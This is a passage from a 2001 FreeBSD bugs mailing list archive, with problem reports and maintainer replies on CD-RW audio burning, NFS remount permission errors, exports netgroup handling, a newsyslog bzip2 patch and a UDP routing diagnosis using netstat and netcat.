13:13:04 -0700 (PDT) From: sirmoo@cowbert.2y.net To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/27893: can't burn audio cds on LG CD-RW CED-8083B Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27893 >Category: misc >Synopsis: can't burn audio cds on LG CD-RW CED-8083B >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jun 05 13:20:00 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Peter Lai >Release: 4.3-STABLE >Organization: CowbertNet, Cesium Hyperfine Enterprises >Environment: FreeBSD cowbert.2y.net 4.3-STABLE FreeBSD 4.3-STABLE #0: Tue May 17 11:04:13 EDT 2001 root@cowbert.2y.net:/usr/src/sys/compile/COWBERT43 i386 >Description: when using burncd to write in audio mode, nothing gets written, and the resulting burncd message is: next writeable LBA 0 writing from file foo.raw size 39735 KB only wrote -1 of 37632 bytes and exits. kernel messages: Jun 5 15:21:25 cowbert /kernel: acd0: READ_TOC - ILLEGAL REQUEST asc=64 ascq=00 error=04 Jun 5 15:21:25 cowbert /kernel: acd: mode sense 00-3a-00-00-00-00-00-00-05-32-01-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 Jun 5 15:21:25 cowbert /kernel: acd: modeselect pagesize=60 Jun 5 15:21:25 cowbert /kernel: acd: mode select 00-3a-00-00-00-00-00-00-05-32-11-c0-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 Jun 5 15:21:25 cowbert /kernel: acd0: WRITE_BIG - ILLEGAL REQUEST asc=64 ascq=00 error=04 data mode burns fine even at 4X speed. in case it's useful, here's dmesg.boot acd: mode sense 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 acd: mode sense 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 acd: mode sense 00-1c-70-00-00-00-00-00-2a-14-07-07-71-67-29-03-16-0d-00-ff-08-00-10-8a-00-00-02-c2-02-c2 acd0: CD-RW at ata1-master using PIO4 >How-To-Repeat: burncd -f /dev/acd0c -s 1 audio foo.raw >Fix: none. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 13:30:17 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D5C7E37B40E for ; Tue, 5 Jun 2001 13:30:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55KU4b33965; Tue, 5 Jun 2001 13:30:04 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D23B937B401 for ; Tue, 5 Jun 2001 13:28:13 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55KSDd33923; Tue, 5 Jun 2001 13:28:13 -0700 (PDT) (envelope-from nobody) Message-Id: <200106052028.f55KSDd33923@freefall.freebsd.org> Date: Tue, 5 Jun 2001 13:28:13 -0700 (PDT) From: kevind@ikadega.com To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/27894: remounting local filesystem causes nfsd to return EPERM Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27894 >Category: kern >Synopsis: remounting local filesystem causes nfsd to return EPERM >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jun 05 13:30:04 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Kevin Day >Release: 4.3-RELEASE >Organization: Ikadega >Environment: >Description: When remounting a filesystem with different options on an NFS server, for a brief window, write commands from an NFS client to the NFS server get EPERM. >How-To-Repeat: An NFS client was using dd to write data to a file on an NFS server. It was going pretty slowly, so we decided to remount the filesystem on the NFS server with the "async,noatime" options. I hit ^T before we remounted the file system: # dd if=/dev/ad0 of=develdisk bs=8192 load: 0.25 cmd: dd 9578 [nfsrcvlk] 1.11u 83.09s 1% 124k 386446+0 records in 386445+0 records out 3165757440 bytes transferred in 2873.737043 secs (1101617 bytes/sec) It looked like it was going fine. On the server, I typed: # mount -u -o async,noatime,rw /bay0 Instantly, dd on the client reported: dd: develdisk: Permission denied 388710+0 records in 388709+0 records out 3184304128 bytes transferred in 2890.083892 secs (1101803 bytes/sec) # >Fix: No fix, but easy to reproduce. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 13:45:24 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 70E3A37B403; Tue, 5 Jun 2001 13:45:20 -0700 (PDT) (envelope-from iedowse@FreeBSD.org) Received: (from iedowse@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55KjKN34876; Tue, 5 Jun 2001 13:45:20 -0700 (PDT) (envelope-from iedowse) Date: Tue, 5 Jun 2001 13:45:20 -0700 (PDT) From: Message-Id: <200106052045.f55KjKN34876@freefall.freebsd.org> To: doconnor@gsoft.com.au, iedowse@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/14033: Data acq process gets stuck in vmopar Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Data acq process gets stuck in vmopar State-Changed-From-To: open->feedback State-Changed-By: iedowse State-Changed-When: Tue Jun 5 13:40:59 PDT 2001 State-Changed-Why: Is this still a problem with recent releases? The most common case of processes getting stuck in 'vmopar' was fixed before 4.2-RELEASE (nfs_subs.c rev 1.96 + related changes). http://www.FreeBSD.org/cgi/query-pr.cgi?pr=14033 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 13:49:20 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5952537B407; Tue, 5 Jun 2001 13:49:18 -0700 (PDT) (envelope-from wollman@FreeBSD.org) Received: (from wollman@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55KnIX35198; Tue, 5 Jun 2001 13:49:18 -0700 (PDT) (envelope-from wollman) Date: Tue, 5 Jun 2001 13:49:18 -0700 (PDT) From: Message-Id: <200106052049.f55KnIX35198@freefall.freebsd.org> To: akr@m17n.org, wollman@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/27630: mktime failure. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: mktime failure. State-Changed-From-To: open->feedback State-Changed-By: wollman State-Changed-When: Tue Jun 5 13:48:33 PDT 2001 State-Changed-Why: A fix from the maintainer was committed to current. Does this fix resolve your problem? http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27630 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 14: 2:38 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6024137B403; Tue, 5 Jun 2001 14:02:33 -0700 (PDT) (envelope-from iedowse@FreeBSD.org) Received: (from iedowse@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55L2Wq36540; Tue, 5 Jun 2001 14:02:32 -0700 (PDT) (envelope-from iedowse) Date: Tue, 5 Jun 2001 14:02:32 -0700 (PDT) From: Message-Id: <200106052102.f55L2Wq36540@freefall.freebsd.org> To: ilmar@ints.ru, iedowse@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/14510: kernel panic while pressing on console Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: kernel panic while pressing on console State-Changed-From-To: open->closed State-Changed-By: iedowse State-Changed-When: Tue Jun 5 13:58:18 PDT 2001 State-Changed-Why: Duplicate of i386/13817, which was closed some time ago. Revision 1.107 of apm.c (Sept 1999) seems to be the commit that fixed it (Ctrl-Alt-Space, just like Alt-Break, attempts to suspend the machine using APM). http://www.FreeBSD.org/cgi/query-pr.cgi?pr=14510 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 14: 5: 3 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A69BD37B405; Tue, 5 Jun 2001 14:04:56 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55L4up36826; Tue, 5 Jun 2001 14:04:56 -0700 (PDT) (envelope-from phk) Date: Tue, 5 Jun 2001 14:04:56 -0700 (PDT) From: Message-Id: <200106052104.f55L4up36826@freefall.freebsd.org> To: reel@sympatico.ca, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/26689: logname returns error when passing opts args. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: logname returns error when passing opts args. State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Tue Jun 5 14:04:47 PDT 2001 State-Changed-Why: fixed, thanks! http://www.FreeBSD.org/cgi/query-pr.cgi?pr=26689 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 14:35: 9 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 23FCC37B406; Tue, 5 Jun 2001 14:35:06 -0700 (PDT) (envelope-from iedowse@FreeBSD.org) Received: (from iedowse@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55LZ5i42054; Tue, 5 Jun 2001 14:35:05 -0700 (PDT) (envelope-from iedowse) Date: Tue, 5 Jun 2001 14:35:05 -0700 (PDT) From: Message-Id: <200106052135.f55LZ5i42054@freefall.freebsd.org> To: cjohnson@camelot.com, iedowse@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/17483: Cannot run disklabel on virgin disk Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Cannot run disklabel on virgin disk State-Changed-From-To: open->closed State-Changed-By: iedowse State-Changed-When: Tue Jun 5 14:29:43 PDT 2001 State-Changed-Why: This was fixed just after 4.2-RELEASE. disklabel should now be able to initialise slices as well as raw disks. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=17483 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 15:40: 8 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 807EB37B405 for ; Tue, 5 Jun 2001 15:40:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55Me1g69480; Tue, 5 Jun 2001 15:40:01 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C615137B403 for ; Tue, 5 Jun 2001 15:35:40 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55MZel67387; Tue, 5 Jun 2001 15:35:40 -0700 (PDT) (envelope-from nobody) Message-Id: <200106052235.f55MZel67387@freefall.freebsd.org> Date: Tue, 5 Jun 2001 15:35:40 -0700 (PDT) From: sbotsford@yottayotta.com To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/27896: Error in /etc/exports invalidates entire line, not just single host. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27896 >Category: misc >Synopsis: Error in /etc/exports invalidates entire line, not just single host. >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Jun 05 15:40:01 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Sherwood Botsford >Release: 4.2 >Organization: Yotta Yotta Inc >Environment: FreeBSD rhea.edmonton.yottayotta.com 4.2-RELEASE FreeBSD 4.2-RELEASE #0: Mon Mar 5 11:09:22 MST 2001 root@rhea.edmonton.yottayotta.com:/usr/src/sys/compile/RHEA-EXP1 i386 >Description: if a host is defined as part of a netgroup, and is mentioned explicitly for another line for the same file system, but with different privledges, then the entire line is invalidated. >How-To-Repeat: Consider: lindesk is the netgroup containing dumpling, croisant, and biscuit. linserve is the netgroup containing smaug, balrog, and gollum explorer is a linux desktop box used for administration. Rhea has the following exports file: /nfs/home -maproot=nobody lindesk /nfs/home -maproot=root explorer linserve This works. Now add explorer to the lindesk group. Foof! linserve can no longer mount /nfs/home. This is counter intuitive. especially, as writting the above line as two lines would localize the problem to explorer. >Fix: Workaround 1. Write lines with a single entry per client entity (host or netgroup) Wishes: 0. If a host causes a problem in a line, then it should affect that host not the whole line: E.g: /nfs/home/ -maproot=root foo bar should be equivalent in behaviour to /nfs/home/ -maproot=root foo /nfs/home/ -maproot=root bar 1. Flag for mountd to test the validity of exports file. E.g. mountd -v /nfs/home foo.bar.com Mount suceeds with privleges root=nobody -- line 27 mound -v /nfs/home explorer.bar.com Mount fails -- host is twice referenced line 26 and 40. 2. Have a mountd flag so that if a host is doubly referenced, it gets the more restrictive set of privleges, OR it gets the first set of privleges. (along with a log message.) OR if a host is mentioned explicity and is in a netgroup, then then explicit reference takes priority. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 16: 2:16 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from midget.dons.net.au (daniel.lnk.telstra.net [139.130.137.70]) by hub.freebsd.org (Postfix) with ESMTP id 3EEF137B405; Tue, 5 Jun 2001 16:02:10 -0700 (PDT) (envelope-from doconnor@gsoft.com.au) Received: from cain.gsoft.com.au (darius@midget.dons.net.au [203.31.81.7]) by midget.dons.net.au (8.11.3/8.9.3) with ESMTP id f55N27819195; Wed, 6 Jun 2001 08:32:07 +0930 (CST) (envelope-from doconnor@gsoft.com.au) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <200106052045.f55KjKN34876@freefall.freebsd.org> Date: Wed, 06 Jun 2001 08:32:07 +0930 (CST) From: "Daniel O'Connor" To: iedowse@FreeBSD.org Subject: Re: kern/14033: Data acq process gets stuck in vmopar Cc: freebsd-bugs@FreeBSD.org Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 05-Jun-01 iedowse@FreeBSD.org wrote: > Is this still a problem with recent releases? The most common case > of processes getting stuck in 'vmopar' was fixed before 4.2-RELEASE > (nfs_subs.c rev 1.96 + related changes). No, I haven't seen this problem in a looong time :) --- Daniel O'Connor software and network engineer for Genesis Software - http://www.gsoft.com.au "The nice thing about standards is that there are so many of them to choose from." -- Andrew Tanenbaum To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 17:17:13 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0CC6B37B401; Tue, 5 Jun 2001 17:17:12 -0700 (PDT) (envelope-from iedowse@FreeBSD.org) Received: (from iedowse@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f560HBp88671; Tue, 5 Jun 2001 17:17:11 -0700 (PDT) (envelope-from iedowse) Date: Tue, 5 Jun 2001 17:17:11 -0700 (PDT) From: Message-Id: <200106060017.f560HBp88671@freefall.freebsd.org> To: doconnor@gsoft.com.au, iedowse@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/14033: Data acq process gets stuck in vmopar Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Data acq process gets stuck in vmopar State-Changed-From-To: feedback->closed State-Changed-By: iedowse State-Changed-When: Tue Jun 5 17:15:26 PDT 2001 State-Changed-Why: Submitter confirms that this is no longer a problem. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=14033 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 23:20: 8 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E80E637B405 for ; Tue, 5 Jun 2001 23:20:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f566K1756443; Tue, 5 Jun 2001 23:20:01 -0700 (PDT) (envelope-from gnats) Received: from totem.fix.no (totem.fix.no [213.142.66.130]) by hub.freebsd.org (Postfix) with ESMTP id 715F437B405 for ; Tue, 5 Jun 2001 23:13:14 -0700 (PDT) (envelope-from anders@totem.fix.no) Received: by totem.fix.no (Postfix, from userid 1000) id 4114D3C8E; Wed, 6 Jun 2001 08:13:13 +0200 (CEST) Message-Id: <20010606061313.4114D3C8E@totem.fix.no> Date: Wed, 6 Jun 2001 08:13:13 +0200 (CEST) From: Anders Nordby Reply-To: Anders Nordby To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/27901: Add bzip2 hook to newsyslog(8) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27901 >Category: bin >Synopsis: Add bzip2 hook to newsyslog(8) >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Jun 05 23:20:01 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Anders Nordby >Release: FreeBSD 4.3-STABLE i386 >Organization: Fluxpod Information eXchange >Environment: kern.osreldate: 430000 (4.3-STABLE) kern.osreldate: 500018 (5.0-20010420-CURRENT) >Description: This adds a bzip2 hook to newsyslog(8), to make it possible to have logs compressed using bzip2. Very useful to keep disk usage down, but: * Adds a dependancy to the bzip2 port. Which is specified in the man page, so I guess it's OK since it only uses the binary. * Uses /usr/local/bin/bzip2 directly. newsyslog will print where it tried to execute bzip2 from if it fails. I suppose I could add a possibility to override the path to bzip2 using an environment variable if that was of interest. This would of course be much easier if bzip2 was in the base system, but I guess there are reasons not to since it's not there already? Let me know what you think, and I'll change the patches if improvements are needed. Both gzip and bzip2 relates to environment variables GZIP and BZIP/BZIP2 for options respectively (this works with newsyslog too), so I guess using a BZIP2PATH to override the bzip2 location may be suitable? >How-To-Repeat: >Fix: In src/usr.sbin: http://home.nuug.no/~anders/newsyslog.diffs In src/etc: http://home.nuug.no/~anders/newsyslog.conf.diffs >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 1:30:20 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1702A37B401 for ; Wed, 6 Jun 2001 01:30:07 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f568U7C75363; Wed, 6 Jun 2001 01:30:07 -0700 (PDT) (envelope-from gnats) Date: Wed, 6 Jun 2001 01:30:07 -0700 (PDT) Message-Id: <200106060830.f568U7C75363@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Ruslan Ermilov Subject: Re: kern/27890: FreeBSD not always seems to take the best route Reply-To: Ruslan Ermilov Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/27890; it has been noted by GNATS. From: Ruslan Ermilov To: Andre Albsmeier Cc: bug-followup@FreeBSD.org Subject: Re: kern/27890: FreeBSD not always seems to take the best route Date: Wed, 6 Jun 2001 11:24:19 +0300 On Tue, Jun 05, 2001 at 06:30:14PM +0200, Andre Albsmeier wrote: > > I have observed this behaviour for a long time now but finally had > time to dig into it... I reference syslogd as an example here > but I think the problem lies in the network code of the kernel... > > > Simple network: > - two routers (1 and 2) > - host C with IP 192.168.1.3 > - host S with IP 192.168.2.1 > > All machines are FreeBSD 4.3-STABLE. > > Router 1 routes pkts between the Internet and 192.168.1.0 > Router 2 routes pkts between 192.168.1.0 and 192.168.2.0 > > > +-----+ +-----+ > default | | 192.168.1.0 | | 192.168.2.0 > -----------| 1 |--------+--------| 2 |--------+-------- more hosts > | | | | | | > +-----+ | +-----+ | > | | > +-----+ +-----+ > | | | | > 192.168.1.3 | C | | S | 192.168.2.1 > | | | | > +-----+ +-----+ > > > Relevant parts of netstat -rn on C during normal operation: > ------------------------------------------------------------- > Destination Gateway Flags Netif Expire > default 192.168.1.1 UGSc fxp0 > 127.0.0.1 127.0.0.1 UH lo0 > 192.168.1 link#1 UC fxp0 => > 192.168.1.1 0:e0:18:90:91:bb UHLW fxp0 1182 > 192.168.1.2 0:e0:18:90:94:c8 UHLW fxp0 1058 > 192.168.1.3 0:e0:18:90:45:dc UHLW lo0 > 192.168.1.255 ff:ff:ff:ff:ff:ff UHLWb fxp0 > 192.168.2 192.168.1.2 UGc fxp0 > > > The syslogd on host C is configured to log messages > to syslogd running on host S. This works perfectly, > all messages appear on host S. > > Now we delete the route to net 192.168.2.0 on host C (this > can appear automatically if router 2 and/or its routed go > down for a while). If syslogd now wants to send a message > to S, the kernel uses the default route which is obvious > because the route to net 192.168.2.0 is gone. We can see the > packets go into router 1. I consider this as the correct > behaviour as well. > > Now we bring back the route to net 192.168.2.0 again on host > C exactly as it was before (e.g. by restarting router 2 and/or > its routed). We can verify this with netstat -rn on C. We can > also ping host S or telnet to it or do other stuff which all > work perfectly. > > The problem is that each time when syslogd on C wants to send > a packet to S, the kernel still uses 1 as router even though > it should send them through 2. After HUPing or restarting > syslogd on C (which means that the UDP socket is closed and > opened again) things are back to normal. > > It seems that as long as packets can be send somewhere, the > kernel doesn't bother if there is a better route to the > destination until the socket is closed and opened again. > > >How-To-Repeat: > > See above. > I can't reproduce this problem on my 4.3-STABLE box. Yes, the UDP socket has the reference to the protocol-cloned route to the destination host S through the router 1 initially, and UDP packets go through that router. In my tests, router 1 (192.168.1.1) was the host *not* configured to act as the router, so all "foreign" packets sent to it got silently ignored. I used the ports/net/netcat utility to connect to the UDP `echo' port of the destination S (192.168.2.1): Fig.1: Initial state, before UDP socket is open. : # netstat -arn : Destination Gateway Flags Refs Use Netif Expire : default 192.168.1.1 UGSc 0 2 rl0 : 127.0.0.1 127.0.0.1 UH 1 6 lo0 : 192.168.1 link#1 UC 3 0 rl0 => Fig.2: We connect(2) UDP socket to the "echo" port on S (192.168.2.1). : # nc -u 192.168.2.1 echo : ping1 : ping2 : ping3 [...] As you can see, we receive no echos back. Fig.3: Routing table after UDP socket is open. : # netstat -arn : Destination Gateway Flags Refs Use Netif Expire : default 192.168.1.1 UGSc 1 2 rl0 : 127.0.0.1 127.0.0.1 UH 1 6 lo0 : 192.168.1 link#1 UC 4 0 rl0 => : 192.168.2.1 192.168.1.1 UGHW 1 14 rl0 The route to S (192.168.2.1) was cloned (W) from the `default' route. refcnt=1 on the 192.168.2.1 route indicates that the UDP socket holds a reference to this route. Fig.4: I manually add the route to the 192.168.2 network. : # route add -net 192.168.2 192.168.1.2 : add net 192.168.2: gateway 192.168.1.2 Fig.5: Routing table after the route to the 192.168.2 network was added. : # netstat -arn : Destination Gateway Flags Refs Use Netif Expire : default 192.168.1.1 UGSc 1 2 rl0 : 127.0.0.1 127.0.0.1 UH 1 6 lo0 : 192.168.1 link#1 UC 4 0 rl0 => : 192.168.2 192.168.1.2 UGSc 0 0 rl0 As you can see, the route to the 192.168.2.1 host is deleted from the routing table. It actually doesn't get freed completely, as it had non-zero reference count (UDP socket still holds on it), but instead it gets marked as DOWN, and will be freed and reallocated in ip_output() on the next use. Fig.6: We continue to send UDP datagrams. : # nc -u 192.168.2.1 echo (continued) : ping4 : ping4 : ping5 : ping5 : ping6 : ping6 As you can see, this time we get the echos back. Fig.7: Routing table after we sent more UDP datagrams. : # netstat -arn -finet : Destination Gateway Flags Refs Use Netif Expire : default 192.168.1.1 UGSc 0 2 rl0 : 127.0.0.1 127.0.0.1 UH 1 6 lo0 : 192.168.1 link#1 UC 4 0 rl0 => : 192.168.2 192.168.1.2 UGSc 1 3 rl0 The refcount on 192.168.2 route has grown to 1, indicating that the UDP socket now holds on this route. The `Use' count of 3 corresponds to our three UDP datagrams (ping4, ping5, and ping6). Could you please repeat these steps in your environment, and try to detect where it behaved differently in your case. Cheers, -- Ruslan Ermilov Oracle Developer/DBA, ru@sunbay.com Sunbay Software AG, ru@FreeBSD.org FreeBSD committer, +380.652.512.251 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 1:40: 2 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6068437B406; Wed, 6 Jun 2001 01:39:54 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f568dsW76018; Wed, 6 Jun 2001 01:39:54 -0700 (PDT) (envelope-from ru) Date: Wed, 6 Jun 2001 01:39:54 -0700 (PDT) From: Message-Id: <200106060839.f568dsW76018@freefall.freebsd.org> To: bannai@pacbell.net, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/27891: Cannot assign a IP address to a interface when a route to the same subnet exists in the routing table Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Cannot assign a IP address to a interface when a route to the same subnet exists in the routing table State-Changed-From-To: open->closed State-Changed-By: ru State-Changed-When: Wed Jun 6 01:35:05 PDT 2001 State-Changed-Why: This is the correct behavior. First, the IP address still gets assigned to the interface. It is the so-called "interface" route that can't be installed because the route to the same destination/netmask already exists in the routing table (whether static or not). Either delete this route before running ifconfig(8), or use a different netmask value. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27891 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 3:18:51 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 